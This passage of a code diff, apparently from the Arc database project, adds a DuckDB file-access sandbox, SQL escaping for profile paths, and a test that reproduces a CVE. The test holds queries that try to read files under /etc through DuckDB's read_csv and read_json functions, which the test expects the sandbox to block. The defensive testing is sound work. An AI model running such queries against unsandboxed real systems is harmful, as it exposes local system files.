     // ARCX_TEST_PATH is unset; CI does NOT set it. Local devs run after
     // `make` in the arcx repo.
     //
    -// Exercises the real wiring: openDuckDB (which registers the connInitFn),
    -// configureDatabase (which runs verifyArcxLoaded), and most importantly
    -// **distinct concurrent pool connections** — sequential QueryRow calls
    -// share an idle connection, so they would all pass even if connInitFn
    -// only fired on the first connection. Holding 4 concurrent *sql.Conn
    -// forces database/sql to open 4 distinct connections; if the
    -// per-connection LOAD ever regresses, iter 2+ fails with
    -// "function arcx_version does not exist".
    +// Exercises the real wiring: configureDatabase runs loadArcxExtension
    +// once for the whole pool (extension registration is database-wide in
    +// DuckDB), then verifyArcxLoaded confirms the function is callable.
    +// Holding 4 concurrent *sql.Conn forces database/sql to open 4 distinct
    +// connections; if the database-wide LOAD ever regresses to per-connection,
    +// iter 2+ fails with "function arcx_version does not exist".
     func TestArcxLoadsAndReportsVersion(t *testing.T) {
     	path := os.Getenv("ARCX_TEST_PATH")
     	if path == "" {
    @@ -86,7 +84,8 @@ func TestArcxLoadsAndReportsVersion(t *testing.T) {
     	}
     
     	// Each pinned connection must have arcx_version() available — proves
    -	// connInitFn fired on every pool member, not just the first.
    +	// the database-wide LOAD propagated to every pool member, not just the
    +	// connection that hosted the one-shot LOAD.
     	for i, c := range conns {
     		var ver string
     		if err := c.QueryRowContext(ctx, "SELECT arcx_version()").Scan(&ver); err != nil {
    @@ -99,9 +98,10 @@ func TestArcxLoadsAndReportsVersion(t *testing.T) {
     	}
     }
     
    -// TestArcxStorageRootIsSetOnEveryConn confirms the SET arcx.storage_root
    -// statement runs alongside LOAD in connInitFn so every pool connection has
    -// the setting available — without it, arc_partition_agg errors at Bind.
    +// TestArcxStorageRootIsSetOnEveryConn confirms that SET GLOBAL arcx.storage_root
    +// (set once by loadArcxExtension) propagates to every pool connection —
    +// without it, arc_partition_agg errors at Bind on connections that never
    +// happened to host the SET.
     func TestArcxStorageRootIsSetOnEveryConn(t *testing.T) {
     	path := os.Getenv("ARCX_TEST_PATH")
     	if path == "" {
    
  • internal/database/duckdb_arrow.go+23 4 modified
    @@ -9,6 +9,7 @@ import (
     	"encoding/json"
     	"fmt"
     	"os"
    +	"path/filepath"
     	"time"
     
     	"github.com/apache/arrow-go/v18/arrow/array"
    @@ -76,9 +77,23 @@ func (d *DuckDB) ArrowQueryWithProfileContext(ctx context.Context, query string)
     		return nil, nil, nil, fmt.Errorf("failed to acquire connection: %w", err)
     	}
     
    -	// Create temp file for profiling output
    -	tmpFile, err := os.CreateTemp("", "duckdb_profile_*.json")
    -	if err != nil {
    +	// Create temp file for profiling output. MUST land inside the DuckDB
    +	// sandbox's allowed_directories — d.config.TempDirectory is always
    +	// allowlisted, os.TempDir() is not. Empty TempDirectory short-circuits
    +	// to the non-profile path without attempting the file create (CreateTemp
    +	// with empty dir falls back to os.TempDir which the sandbox rejects).
    +	var tmpFile *os.File
    +	if d.config.TempDirectory == "" {
    +		d.logger.Debug().Msg("Profile mode requested but TempDirectory is unset; returning Arrow result without profile data")
    +	} else {
    +		var err error
    +		tmpFile, err = os.CreateTemp(d.config.TempDirectory, "duckdb_profile_*.json")
    +		if err != nil {
    +			d.logger.Warn().Err(err).Str("temp_dir", d.config.TempDirectory).Msg("Failed to create profile temp file; falling back to non-profile Arrow path")
    +			tmpFile = nil
    +		}
    +	}
    +	if tmpFile == nil {
     		// Fall back to non-profile Arrow query
     		var reader array.RecordReader
     		rawErr := conn.Raw(func(driverConn any) error {
    @@ -100,7 +115,11 @@ func (d *DuckDB) ArrowQueryWithProfileContext(ctx context.Context, query string)
     	if _, err := conn.ExecContext(ctx, "PRAGMA enable_profiling='json'"); err != nil {
     		d.logger.Warn().Err(err).Msg("Failed to enable profiling")
     	}
    -	if _, err := conn.ExecContext(ctx, fmt.Sprintf("PRAGMA profiling_output='%s'", profilePath)); err != nil {
    +	// Escape profilePath against the same SQL-injection surface duckdb.go
    +	// guards (operator's TempDirectory could contain a single quote).
    +	// ToSlash so Windows backslashes from os.CreateTemp match the sandbox
    +	// allowlist (allowed_directories stores forward-slash entries).
    +	if _, err := conn.ExecContext(ctx, fmt.Sprintf("PRAGMA profiling_output='%s'", escapeSQLString(filepath.ToSlash(profilePath)))); err != nil {
     		d.logger.Warn().Err(err).Msg("Failed to set profiling output")
     	}
     	if _, err := conn.ExecContext(ctx, "SET custom_profiling_settings='{\"PLANNER\": \"true\", \"PLANNER_BINDING\": \"true\", \"PHYSICAL_PLANNER\": \"true\", \"OPERATOR_TIMING\": \"true\", \"OPERATOR_CARDINALITY\": \"true\"}'"); err != nil {
    
  • internal/database/duckdb.go+163 97 modified
    @@ -3,18 +3,16 @@ package database
     import (
     	"context"
     	"database/sql"
    -	"database/sql/driver"
     	"encoding/json"
     	"fmt"
     	"os"
     	"path/filepath"
     	"runtime"
     	"strings"
    -	"sync"
     	"time"
     
     	"github.com/basekick-labs/arc/internal/memtrim"
    -	duckdb "github.com/duckdb/duckdb-go/v2"
    +	_ "github.com/duckdb/duckdb-go/v2" // duckdb driver registration
     	"github.com/rs/zerolog"
     )
     
    @@ -47,17 +45,26 @@ func escapeSQLString(s string) string {
     	return strings.ReplaceAll(s, "'", "''")
     }
     
    +// quoteDuckDBIdent quotes a DuckDB identifier (table, column, setting name)
    +// for safe interpolation into SQL. DuckDB identifier quoting uses double
    +// quotes; embedded double quotes are doubled (`"foo""bar"`), matching the
    +// SQL standard. This is distinct from Go's %q verb, which uses Go-style
    +// backslash escapes that DuckDB's parser rejects.
    +func quoteDuckDBIdent(name string) string {
    +	return `"` + strings.ReplaceAll(name, `"`, `""`) + `"`
    +}
    +
     // stripURLScheme normalises an S3 endpoint into the bare "host:port" form
     // that DuckDB's httpfs extension expects. The AWS SDK accepts either
     // "host:port" or "scheme://host:port[/]"; DuckDB does not. Passing scheme'd
     // or trailing-slashed input through verbatim produces "http://http://..."
     // URLs that fail to resolve.
     //
     // Strips, in order:
    -//  - leading and trailing whitespace (paste artefacts),
    -//  - leading "http://" or "https://" (case-insensitive — RFC 3986 schemes
    -//    are case-insensitive and users routinely paste mixed-case),
    -//  - trailing slashes ("host:port/" → "host:port").
    +//   - leading and trailing whitespace (paste artefacts),
    +//   - leading "http://" or "https://" (case-insensitive — RFC 3986 schemes
    +//     are case-insensitive and users routinely paste mixed-case),
    +//   - trailing slashes ("host:port/" → "host:port").
     //
     // The case of the remainder is preserved (bucket names and path components
     // can be case-sensitive depending on the S3 implementation).
    @@ -90,11 +97,47 @@ type Config struct {
     	S3SecretKey string
     	S3Endpoint  string // Custom endpoint for MinIO or S3-compatible services
     	S3UseSSL    bool
    -	S3PathStyle bool // Use path-style addressing (required for MinIO)
    +	S3PathStyle bool   // Use path-style addressing (required for MinIO)
    +	S3Bucket    string // Bucket name; used to build the allowed_directories prefix for the sandbox
    +	S3Prefix    string // Key prefix under the bucket; used with S3Bucket to scope sandbox access
     	// Azure Blob Storage configuration for azure extension
     	AzureAccountName string
     	AzureAccountKey  string
     	AzureEndpoint    string // Custom endpoint (optional)
    +	AzureContainer   string // Container name; used to build the allowed_directories prefix for the sandbox
    +	// Cold-tier sandbox allowlist entries. Independent from S3Bucket /
    +	// AzureContainer (which describe Arc's primary/hot storage) because
    +	// Enterprise tiered storage routinely combines hot=local with cold=S3 —
    +	// hot S3 fields would then be empty and a hot-only allowlist would
    +	// block every cold-tier query. Populated from cfg.TieredStorage.Cold
    +	// by cmd/arc/main.go when tiering is enabled.
    +	ColdS3Bucket       string
    +	ColdS3Prefix       string
    +	ColdAzureContainer string
    +	// LocalStorageRoot is the absolute path of the local-storage backend root,
    +	// used to whitelist Arc-managed files in the DuckDB sandbox. Equals
    +	// ArcxStorageRoot when arcx is enabled; populated independently so the
    +	// sandbox keeps a working entry even on deployments without arcx.
    +	LocalStorageRoot string
    +	// UploadDir is the dedicated directory the API layer uses for multipart
    +	// uploads (CSV/Parquet imports) and the DELETE handler's S3-rewrite
    +	// staging. Added to allowed_directories so DuckDB can read/write via
    +	// read_csv/read_parquet/COPY. Distinct from TempDirectory (DuckDB spill)
    +	// for clean separation; main.go usually places it under TempDirectory
    +	// so operators get a single config knob.
    +	UploadDir string
    +	// CompactionTempDirectory is the operator-configured base path
    +	// compaction jobs use to stage rewritten parquet files
    +	// (cfg.Compaction.TempDirectory, default ./data/compaction).
    +	//
    +	// Compaction currently runs in a subprocess (internal/compaction/
    +	// subprocess.go) that opens its OWN DuckDB outside this package's
    +	// configureDatabase, so the subprocess is NOT subject to this sandbox
    +	// and does not need the entry to function today. Allowlisting it
    +	// anyway is defensive: any future refactor moving compaction back
    +	// in-process would otherwise fail post-lockdown with a confusing
    +	// permission error on COPY ... TO. Empty disables the entry.
    +	CompactionTempDirectory string
     	// Query optimization configuration
     	EnableS3Cache     bool  // Enable S3 file caching via cache_httpfs extension
     	S3CacheSize       int64 // Cache size in bytes
    @@ -114,12 +157,10 @@ type Config struct {
     func New(cfg *Config, logger zerolog.Logger) (*DuckDB, error) {
     	dsn := buildDSN(cfg)
     
    -	// Open the *sql.DB. When arcx is configured we route through
    -	// duckdb.NewConnector + connInitFn so the LOAD runs on every pooled
    -	// connection (DuckDB's LOAD is per-connection — there is no SET GLOBAL
    -	// equivalent, so a bare `db.Exec("LOAD …")` would only register the
    -	// extension on whichever pool member database/sql happened to hand us).
    -	db, err := openDuckDB(dsn, cfg, logger)
    +	// Open the *sql.DB. Extension registration in DuckDB is per-database
    +	// (ExtensionManager lives on DatabaseInstance), so a single LOAD inside
    +	// configureDatabase suffices for the whole pool — no connInitFn needed.
    +	db, err := sql.Open("duckdb", dsn)
     	if err != nil {
     		return nil, fmt.Errorf("failed to open duckdb: %w", err)
     	}
    @@ -177,70 +218,72 @@ func buildDSN(cfg *Config) string {
     	return ""
     }
     
    -// openDuckDB returns a *sql.DB. When arcx is configured we go through
    -// duckdb.NewConnector with an init callback that runs `LOAD '…'` on every
    -// new pooled connection — DuckDB's LOAD is per-connection, so this is the
    -// only correct way to make arcx available across the whole pool. When
    -// arcx is disabled we use the simpler driver-registered sql.Open path.
    -func openDuckDB(dsn string, cfg *Config, logger zerolog.Logger) (*sql.DB, error) {
    +// arcxLoadTimeout bounds the LOAD '<path>' call so a corrupt or
    +// network-mounted extension file cannot hang DuckDB initialization
    +// indefinitely. 30s is generous for dlopen + DuckDB's Load() hook; real
    +// loads are tens of milliseconds.
    +const arcxLoadTimeout = 30 * time.Second
    +
    +// arcxVerifyTimeout bounds the post-LOAD `SELECT arcx_version()` proof-
    +// of-life. Pure metadata read; ten seconds is generous to cover transient
    +// pool contention during startup while still bounding a hung DuckDB.
    +const arcxVerifyTimeout = 10 * time.Second
    +
    +// arcxStorageRootSetting is the dotted extension-registered global setting
    +// arcx exposes for the partition_agg table function's filesystem root.
    +// SET GLOBAL "arcx.storage_root" = '<path>' propagates database-wide.
    +const arcxStorageRootSetting = "arcx.storage_root"
    +
    +// loadArcxExtension performs a one-shot LOAD of the proprietary arcx
    +// extension and configures its global storage root. Extension registration
    +// is database-wide in DuckDB (ExtensionManager lives on DatabaseInstance),
    +// so a single LOAD registers arcx for every pool connection; SET GLOBAL on
    +// arcx-registered settings propagates the same way. Called once during
    +// configureDatabase. Idempotent — re-LOAD of an already-registered
    +// extension is a no-op success even after the sandbox lockdown.
    +func loadArcxExtension(db *sql.DB, cfg *Config, logger zerolog.Logger) error {
     	if cfg.ArcxExtensionPath == "" {
    -		return sql.Open("duckdb", dsn)
    +		return nil
     	}
    +	componentLogger := logger.With().Str("component", "duckdb").Logger()
     
    -	// Capture the path into a local so the closure does not retain the
    -	// whole *Config (the logger field below would otherwise pull cfg in
    -	// for its entire lifetime — gemini round 1).
    -	//
    -	// filepath.ToSlash normalises Windows-style backslashes to forward
    -	// slashes. DuckDB's LOAD parses the path as a single-quoted SQL
    -	// string literal, where backslashes are not interpreted as escapes
    -	// but Windows paths like `C:\Program Files\arcx\arcx.duckdb_extension`
    -	// have been observed to confuse the loader on some Windows builds.
    -	// Forward slashes are accepted on every platform DuckDB supports.
    +	// filepath.ToSlash normalises Windows-style backslashes. DuckDB's LOAD
    +	// parses the path as a single-quoted SQL string literal where backslashes
    +	// are not interpreted as escapes, but Windows paths like
    +	// `C:\Program Files\arcx\arcx.duckdb_extension` have been observed to
    +	// confuse the loader on some Windows builds. Forward slashes work
    +	// everywhere DuckDB runs.
     	path := filepath.ToSlash(cfg.ArcxExtensionPath)
    -	loadSQL := fmt.Sprintf("LOAD '%s'", escapeSQLString(path))
    -	// Set arcx.storage_root in the same connInitFn so the operator can
    -	// resolve filesystem paths without taking them as arguments. The setting
    -	// is registered by the extension at LOAD time; SET runs in the same
    -	// statement after LOAD via a semicolon separator.
    -	connInitSQL := loadSQL
    -	if cfg.ArcxStorageRoot != "" {
    -		storageRoot := filepath.ToSlash(cfg.ArcxStorageRoot)
    -		connInitSQL = fmt.Sprintf("%s; SET arcx.storage_root = '%s'", loadSQL, escapeSQLString(storageRoot))
    +
    +	ctx, cancel := context.WithTimeout(context.Background(), arcxLoadTimeout)
    +	defer cancel()
    +
    +	// Pinned connection: DuckDB's LOAD registers the extension on the
    +	// database-wide ExtensionManager, but we pin a connection anyway so
    +	// the LOAD and the immediately-following SET GLOBAL land on the same
    +	// underlying handle. Defensive against future driver changes.
    +	conn, err := db.Conn(ctx)
    +	if err != nil {
    +		return fmt.Errorf("acquire pinned connection for arcx LOAD: %w", err)
     	}
    -	componentLogger := logger.With().Str("component", "duckdb").Logger()
    +	defer conn.Close()
     
    -	// arcxLoadTimeout bounds the connection-init LOAD so a corrupt or
    -	// network-mounted extension file cannot hang pool acquisition
    -	// indefinitely. 30s is generous for dlopen + DuckDB's Load() hook;
    -	// real loads are tens of milliseconds.
    -	const arcxLoadTimeout = 30 * time.Second
    -
    -	// loadErrLogOnce gates the Error log to once per process. The error
    -	// itself still propagates to database/sql on every connInitFn call —
    -	// only the log line is throttled. Without this, a misconfigured path
    -	// (missing file, ABI mismatch) under load would emit one Error per
    -	// connection-acquire attempt — easily hundreds per second.
    -	var loadErrLogOnce sync.Once
    -
    -	connector, err := duckdb.NewConnector(dsn, func(execer driver.ExecerContext) error {
    -		ctx, cancel := context.WithTimeout(context.Background(), arcxLoadTimeout)
    -		defer cancel()
    -		_, execErr := execer.ExecContext(ctx, connInitSQL, nil)
    -		if execErr != nil {
    -			loadErrLogOnce.Do(func() {
    -				componentLogger.Error().Err(execErr).
    -					Str("path", path).
    -					Msg("arcx LOAD failed on new DuckDB connection (subsequent failures suppressed for log hygiene)")
    -			})
    -			return fmt.Errorf("arcx LOAD on new connection: %w", execErr)
    +	if _, err := conn.ExecContext(ctx, fmt.Sprintf("LOAD '%s'", escapeSQLString(path))); err != nil {
    +		return fmt.Errorf("arcx LOAD: %w", err)
    +	}
    +	if cfg.ArcxStorageRoot != "" {
    +		storageRoot := filepath.ToSlash(cfg.ArcxStorageRoot)
    +		// SET GLOBAL because arcx.storage_root is an extension-registered
    +		// global setting; verified empirically in Phase 0 that the value
    +		// propagates to fresh pool connections. Double-quoted because the
    +		// setting name contains a dot — bare identifiers with dots are
    +		// parsed as table-qualified column refs by DuckDB.
    +		if _, err := conn.ExecContext(ctx, "SET GLOBAL "+quoteDuckDBIdent(arcxStorageRootSetting)+" = '"+escapeSQLString(storageRoot)+"'"); err != nil {
    +			return fmt.Errorf("SET arcx.storage_root: %w", err)
     		}
    -		return nil
    -	})
    -	if err != nil {
    -		return nil, fmt.Errorf("create duckdb connector for arcx: %w", err)
     	}
    -	return sql.OpenDB(connector), nil
    +	componentLogger.Info().Str("path", path).Msg("arcx extension loaded (database-wide)")
    +	return nil
     }
     
     // configureDatabase sets DuckDB configuration after connection
    @@ -301,40 +344,43 @@ func configureDatabase(db *sql.DB, cfg *Config, logger zerolog.Logger) error {
     		}
     	}
     
    -	// Verify the proprietary arcx extension is loaded into the pool. The
    -	// LOAD itself happens inside the connInitFn registered with
    -	// duckdb.NewConnector (see openDuckDB) — that callback fires on every
    -	// new pool connection so the extension is available across the whole
    -	// pool, not just the connection that happened to receive the first
    -	// db.Exec("LOAD …") call. Here we pin one connection and ask it for
    -	// arcx_version() to confirm the load actually took effect. License
    -	// gating happens upstream (cmd/arc/main.go clears ArcxExtensionPath
    -	// when the license does not permit it), so an empty path means arcx
    -	// is intentionally disabled.
    +	// Load the proprietary arcx extension once for the whole pool. Extension
    +	// registration is database-wide, so a single LOAD covers every connection.
    +	// License gating happens upstream (cmd/arc/main.go clears
    +	// ArcxExtensionPath when the license does not permit it), so an empty
    +	// path means arcx is intentionally disabled.
     	if cfg.ArcxExtensionPath != "" {
    +		if err := loadArcxExtension(db, cfg, logger); err != nil {
    +			return fmt.Errorf("failed to load arcx extension: %w", err)
    +		}
     		if err := verifyArcxLoaded(db, cfg, logger); err != nil {
     			return fmt.Errorf("failed to verify arcx extension: %w", err)
     		}
     	}
     
    +	// Final step: lock down DuckDB's file-access surface so user-supplied SQL
    +	// cannot reach arbitrary local files or remote URLs. Must run AFTER every
    +	// INSTALL/LOAD above (enable_external_access=false blocks future LOADs).
    +	if err := lockdownExternalAccess(db, cfg, logger); err != nil {
    +		return fmt.Errorf("failed to lock down DuckDB external access: %w", err)
    +	}
    +
     	return nil
     }
     
     // verifyArcxLoaded confirms the proprietary arcx DuckDB extension is
    -// available on a pool connection. The LOAD itself runs in the connInitFn
    -// registered with duckdb.NewConnector for every new connection; this
    -// function only proves that one of those connections actually responded
    -// to arcx_version(). An empty version string signals an ABI mismatch or
    -// a buggy build of arcx — fail-fast rather than limping along.
    +// callable on a pool connection. An empty version string signals an ABI
    +// mismatch or a buggy build of arcx — fail-fast rather than limping along.
     //
    -// Pinned via db.Conn(ctx) so the verify query lands on a connection
    -// that has gone through the init callback (any connection from the
    -// pool would, but pinning is defensive against future driver changes).
    +// Pinned via db.Conn(ctx) so the verify query lands on a specific connection
    +// (defensive against future driver changes — extension state is currently
    +// database-wide on DuckDB but pinning costs nothing and survives reorgs).
     func verifyArcxLoaded(db *sql.DB, cfg *Config, logger zerolog.Logger) error {
     	if cfg.ArcxExtensionPath == "" {
     		return nil // belt-and-suspenders; caller already guards this
     	}
    -	ctx, cancel := context.WithTimeout(context.Background(), 10*time.Second)
    +	componentLogger := logger.With().Str("component", "duckdb").Logger()
    +	ctx, cancel := context.WithTimeout(context.Background(), arcxVerifyTimeout)
     	defer cancel()
     
     	conn, err := db.Conn(ctx)
    @@ -350,11 +396,10 @@ func verifyArcxLoaded(db *sql.DB, cfg *Config, logger zerolog.Logger) error {
     	if strings.TrimSpace(ver) == "" {
     		return fmt.Errorf("arcx_version() returned empty string (extension binary corrupt or ABI mismatch?)")
     	}
    -	logger.Info().
    -		Str("component", "duckdb").
    +	componentLogger.Info().
     		Str("path", cfg.ArcxExtensionPath).
     		Str("arcx_version", ver).
    -		Msg("arcx extension loaded")
    +		Msg("arcx extension verified")
     	return nil
     }
     
    @@ -753,10 +798,25 @@ func (d *DuckDB) QueryWithProfileContext(ctx context.Context, query string) (*sq
     		return nil, nil, nil, fmt.Errorf("failed to acquire connection: %w", err)
     	}
     
    -	// Create a temporary file for profiling output
    -	tmpFile, err := os.CreateTemp("", "duckdb_profile_*.json")
    -	if err != nil {
    -		// Fall back to regular query if we can't create temp file
    +	// Create a temporary file for profiling output. MUST land inside the
    +	// DuckDB sandbox's allowed_directories — d.config.TempDirectory is
    +	// always allowlisted (see buildAllowedDirectories), os.TempDir() is
    +	// not. An empty TempDirectory would make CreateTemp fall back to
    +	// os.TempDir() which the sandbox rejects, so explicitly fall through
    +	// to the non-profile path without even attempting the file create.
    +	var tmpFile *os.File
    +	if d.config.TempDirectory == "" {
    +		d.logger.Debug().Msg("Profile mode requested but TempDirectory is unset; returning result without profile data")
    +	} else {
    +		var err error
    +		tmpFile, err = os.CreateTemp(d.config.TempDirectory, "duckdb_profile_*.json")
    +		if err != nil {
    +			d.logger.Warn().Err(err).Str("temp_dir", d.config.TempDirectory).Msg("Failed to create profile temp file; falling back to non-profile query path")
    +			tmpFile = nil
    +		}
    +	}
    +	if tmpFile == nil {
    +		// No usable temp dir — return a regular query result without profile data.
     		rows, err := conn.QueryContext(ctx, query)
     		if err != nil {
     			conn.Close()
    @@ -773,7 +833,13 @@ func (d *DuckDB) QueryWithProfileContext(ctx context.Context, query string) (*sq
     	if _, err := conn.ExecContext(ctx, "PRAGMA enable_profiling='json'"); err != nil {
     		d.logger.Warn().Err(err).Msg("Failed to enable profiling")
     	}
    -	if _, err := conn.ExecContext(ctx, fmt.Sprintf("PRAGMA profiling_output='%s'", profilePath)); err != nil {
    +	// profilePath includes the operator-controlled d.config.TempDirectory
    +	// prefix; escape it the same way SET GLOBAL temp_directory does above
    +	// to neutralise any embedded single quote (operator config like
    +	// "/data/arc/it's-folder" would otherwise break out of the SQL literal).
    +	// ToSlash so Windows backslashes from os.CreateTemp match the sandbox
    +	// allowlist (allowed_directories stores forward-slash entries).
    +	if _, err := conn.ExecContext(ctx, fmt.Sprintf("PRAGMA profiling_output='%s'", escapeSQLString(filepath.ToSlash(profilePath)))); err != nil {
     		d.logger.Warn().Err(err).Msg("Failed to set profiling output")
     	}
     	// Enable planner timing metrics
    
  • internal/database/duckdb_sandbox_test.go+379 0 added
    @@ -0,0 +1,379 @@
    +package database
    +
    +import (
    +	"context"
    +	"database/sql"
    +	"fmt"
    +	"os"
    +	"path/filepath"
    +	"slices"
    +	"sort"
    +	"testing"
    +
    +	"github.com/rs/zerolog"
    +)
    +
    +// TestBuildAllowedDirectories verifies the pure-Go list assembly. Set-equality
    +// comparison (not order) because the helper's own doc-comment promises that
    +// the order is informational only — a future refactor reordering entries for
    +// readability must not regress the table.
    +func TestBuildAllowedDirectories(t *testing.T) {
    +	t.Parallel()
    +	tests := []struct {
    +		name string
    +		cfg  *Config
    +		want []string
    +	}{
    +		{
    +			name: "all empty produces empty list",
    +			cfg:  &Config{},
    +			want: nil,
    +		},
    +		{
    +			name: "local + spill + upload + compaction",
    +			cfg: &Config{
    +				LocalStorageRoot:        "/var/lib/arc/data",
    +				TempDirectory:           "/var/lib/arc/spill",
    +				UploadDir:               "/var/lib/arc/spill/arc-uploads",
    +				CompactionTempDirectory: "/var/lib/arc/compaction",
    +			},
    +			want: []string{
    +				"/var/lib/arc/data/",
    +				"/var/lib/arc/spill/",
    +				"/var/lib/arc/spill/arc-uploads/",
    +				"/var/lib/arc/compaction/",
    +			},
    +		},
    +		{
    +			name: "trailing slash preserved (idempotent)",
    +			cfg:  &Config{LocalStorageRoot: "/srv/arc/"},
    +			want: []string{"/srv/arc/"},
    +		},
    +		{
    +			name: "hot s3 bucket + prefix",
    +			cfg:  &Config{S3Bucket: "my-bucket", S3Prefix: "tenant-a/"},
    +			want: []string{"s3://my-bucket/tenant-a/"},
    +		},
    +		{
    +			name: "hot s3 bucket without prefix",
    +			cfg:  &Config{S3Bucket: "warehouse"},
    +			want: []string{"s3://warehouse/"},
    +		},
    +		{
    +			name: "leading-slash prefix is stripped",
    +			cfg:  &Config{S3Bucket: "my-bucket", S3Prefix: "/tenant-a"},
    +			want: []string{"s3://my-bucket/tenant-a/"},
    +		},
    +		{
    +			name: "double-leading-slash prefix is stripped (TrimLeft + path.Clean)",
    +			cfg:  &Config{S3Bucket: "my-bucket", S3Prefix: "//tenant-a"},
    +			want: []string{"s3://my-bucket/tenant-a/"},
    +		},
    +		{
    +			name: "interior double-slash in prefix is collapsed (path.Clean)",
    +			cfg:  &Config{S3Bucket: "my-bucket", S3Prefix: "tenant-a//sub"},
    +			want: []string{"s3://my-bucket/tenant-a/sub/"},
    +		},
    +		{
    +			name: "parent-traversal `..` in prefix falls back to bare bucket",
    +			cfg:  &Config{S3Bucket: "my-bucket", S3Prefix: ".."},
    +			want: []string{"s3://my-bucket/"},
    +		},
    +		{
    +			name: "parent-traversal `../escape` in prefix falls back to bare bucket",
    +			cfg:  &Config{S3Bucket: "my-bucket", S3Prefix: "../escape"},
    +			want: []string{"s3://my-bucket/"},
    +		},
    +		{
    +			name: "dot-only prefix falls back to bare bucket",
    +			cfg:  &Config{S3Bucket: "my-bucket", S3Prefix: "./"},
    +			want: []string{"s3://my-bucket/"},
    +		},
    +		{
    +			name: "hot + cold s3 distinct buckets",
    +			cfg: &Config{
    +				S3Bucket:     "hot",
    +				S3Prefix:     "p1",
    +				ColdS3Bucket: "cold",
    +				ColdS3Prefix: "p2",
    +			},
    +			want: []string{"s3://hot/p1/", "s3://cold/p2/"},
    +		},
    +		{
    +			name: "cold s3 same bucket and same prefix as hot deduplicated",
    +			cfg: &Config{
    +				S3Bucket:     "shared",
    +				S3Prefix:     "p",
    +				ColdS3Bucket: "shared",
    +				ColdS3Prefix: "p",
    +			},
    +			want: []string{"s3://shared/p/"},
    +		},
    +		{
    +			name: "cold s3 same bucket different prefix kept (full-URI dedup)",
    +			cfg: &Config{
    +				S3Bucket:     "warehouse",
    +				S3Prefix:     "hot",
    +				ColdS3Bucket: "warehouse",
    +				ColdS3Prefix: "cold",
    +			},
    +			want: []string{"s3://warehouse/hot/", "s3://warehouse/cold/"},
    +		},
    +		{
    +			name: "hot + cold azure distinct containers",
    +			cfg: &Config{
    +				AzureContainer:     "hot",
    +				ColdAzureContainer: "cold",
    +			},
    +			want: []string{"azure://hot/", "azure://cold/"},
    +		},
    +		{
    +			name: "no os.TempDir leak when only LocalStorageRoot is set",
    +			cfg:  &Config{LocalStorageRoot: "/var/lib/arc/data"},
    +			want: []string{"/var/lib/arc/data/"},
    +		},
    +	}
    +	for _, tt := range tests {
    +		t.Run(tt.name, func(t *testing.T) {
    +			t.Parallel()
    +			got := buildAllowedDirectories(tt.cfg)
    +			gotSorted := append([]string(nil), got...)
    +			wantSorted := append([]string(nil), tt.want...)
    +			sort.Strings(gotSorted)
    +			sort.Strings(wantSorted)
    +			if !slices.Equal(gotSorted, wantSorted) {
    +				t.Errorf("buildAllowedDirectories(%+v) = %v, want %v (set-equality)",
    +					tt.cfg, got, tt.want)
    +			}
    +		})
    +	}
    +}
    +
    +// newSandboxFixture spins up a DuckDB with a real LocalStorageRoot under
    +// t.TempDir() and pre-populates a parquet file inside that root. Returns the
    +// DB plus the path of the inside-allowlist fixture so each sub-test can use
    +// them without re-building. Sub-tests share the same DB; they must not
    +// mutate sandbox state (e.g. attempting to re-set allowed_directories).
    +func newSandboxFixture(t *testing.T) (*DuckDB, string) {
    +	t.Helper()
    +	tmp := t.TempDir()
    +	storageRoot := filepath.Join(tmp, "data")
    +	if err := os.MkdirAll(storageRoot, 0o700); err != nil {
    +		t.Fatalf("mkdir storageRoot: %v", err)
    +	}
    +	cfg := &Config{
    +		MaxConnections:   4,
    +		MemoryLimit:      "256MB",
    +		LocalStorageRoot: storageRoot,
    +		TempDirectory:    tmp, // so spill/profile temp files land inside the sandbox
    +	}
    +	db, err := New(cfg, zerolog.Nop())
    +	if err != nil {
    +		t.Fatalf("database.New: %v", err)
    +	}
    +	t.Cleanup(func() { db.Close() })
    +
    +	insidePath := filepath.Join(storageRoot, "fixture.parquet")
    +	createSQL := fmt.Sprintf("COPY (SELECT 1 AS x UNION ALL SELECT 2) TO '%s' (FORMAT PARQUET)", escapeSQLString(insidePath))
    +	if _, err := db.DB().ExecContext(context.Background(), createSQL); err != nil {
    +		t.Fatalf("COPY TO inside-allowlist path failed (sandbox setup wrong?): %v", err)
    +	}
    +	return db, insidePath
    +}
    +
    +// TestSandbox is the CVE reproduction plus a full sweep of bypass attempts
    +// across the DuckDB I/O surface. Sub-tests share a single DB fixture and run
    +// SEQUENTIALLY (no t.Parallel() on subtests) because the "enforced on every
    +// pool connection" sub-test pins all MaxConnections=4 connections; a parallel
    +// sibling would deadlock waiting for a connection. Every sub-test is
    +// read-only against the post-lockdown sandbox state, so order does not
    +// affect outcomes — only the connection-pool contention prevents parallelism.
    +func TestSandbox(t *testing.T) {
    +	t.Parallel()
    +	db, insidePath := newSandboxFixture(t)
    +	ctx := context.Background()
    +
    +	// Anything not in the allowlist. /etc is a stable not-temp not-storage
    +	// directory on every supported test host; the specific file does not
    +	// need to exist — the sandbox check fires at file-open before the
    +	// filesystem decides whether the path resolves.
    +	const outsidePath = "/etc/no_such_file_arc_sandbox_test"
    +
    +	// Helper: assert the query errors with any error (the security guarantee
    +	// is the failure axis itself; the error message text varies across DuckDB
    +	// versions and is not part of the public contract).
    +	mustFail := func(t *testing.T, q, label string) {
    +		t.Helper()
    +		_, err := db.DB().QueryContext(ctx, q)
    +		if err == nil {
    +			t.Errorf("%s: query succeeded but sandbox should block it: %q", label, q)
    +		}
    +	}
    +
    +	t.Run("baseline: read_parquet inside allowlist works", func(t *testing.T) {
    +		var n int
    +		if err := db.DB().QueryRowContext(ctx,
    +			fmt.Sprintf("SELECT COUNT(*) FROM read_parquet('%s')", escapeSQLString(insidePath)),
    +		).Scan(&n); err != nil {
    +			t.Fatalf("read_parquet allowed path: %v", err)
    +		}
    +		if n != 2 {
    +			t.Errorf("got %d rows from fixture, want 2", n)
    +		}
    +	})
    +
    +	// CVE class — every I/O scalar/table function that takes a path. If
    +	// DuckDB adds new ones in a future release, the structural fix
    +	// (allowed_directories) covers them too — no test needs to be added
    +	// for each new function, but the existing sweep documents what we
    +	// explicitly verified against the current release.
    +	t.Run("io family blocked outside allowlist", func(t *testing.T) {
    +		for _, q := range []string{
    +			fmt.Sprintf("SELECT * FROM read_csv_auto('%s', header=false, columns={'l':'VARCHAR'}) LIMIT 1", outsidePath),
    +			fmt.Sprintf("SELECT * FROM read_csv('%s', header=false, columns={'l':'VARCHAR'}) LIMIT 1", outsidePath),
    +			fmt.Sprintf("SELECT * FROM read_json_auto('%s') LIMIT 1", outsidePath),
